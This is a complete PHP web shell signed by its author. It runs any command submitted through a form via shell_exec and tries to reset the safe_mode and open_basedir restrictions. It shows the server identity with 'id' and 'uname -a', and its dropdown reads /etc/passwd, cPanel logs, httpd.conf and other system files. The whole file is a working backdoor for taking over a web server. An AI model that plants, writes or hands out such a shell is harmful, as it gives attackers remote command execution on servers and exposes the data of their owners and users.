<style type="text/css">
td { font-family:lucida,verdana;font-size:113px;color:#cccccc; }
a { color:#ff0000;text-decoration:none;font-family:lucida,verdana;font-size:13px;font-weight:bold; }
a.visited { color:#ff0000;text-decoration:none;font-family:lucida,verdana;font-size:13px;font-weight:bold; }
a.hover { color:#ff0000;text-decoration:underline;font-family:lucida,verdana;font-size:13px;font-weight:bold; }
.form_elements { background-color:#171717;color:#cccccc;font-family:lucida,verdana;font-size:13px;border:1px solid #ff0000;font-weight:bold; }
body,td,th {
font-size: medium;
}
</style>
<body style="background-color:#171717;font-family:lucida,verdana;font-size:13px;color:#cccccc;">
<?php
echo '<center><h5> Coded By Zakaria </h5></center>';
echo '<center><h5> x2@hotmail.de </h5></center>';
echo "<pre>";
ini_restore("safe_mode");
ini_restore("open_basedir");
$b0ri=shell_exec($_POST[zaki]);
$b0rizq=shell_exec($_POST[b0ri]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h5>";
echo "<b><font color=red>id</font></b>:$uid<br>";
echo "<b><font color=red>uname -a</font></b>:$server<br>";
echo "</h5></pre>";
echo $b0ri;
echo $b0rizq;
echo "<pre>";
print_r('
<form method="POST" action="">
<font color=green>Enter : </font>
<input name="zaki" type="text" class="form_elements">
<input type="submit" class="form_elements" value="Executé">
</form>
<form method="POST" action="">
<font color=green>Select :</font>
<select name="b0ri" size="1" class="form_elements">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select>
<input type="submit" class="form_elements" value="Executé">
</form>
');
?>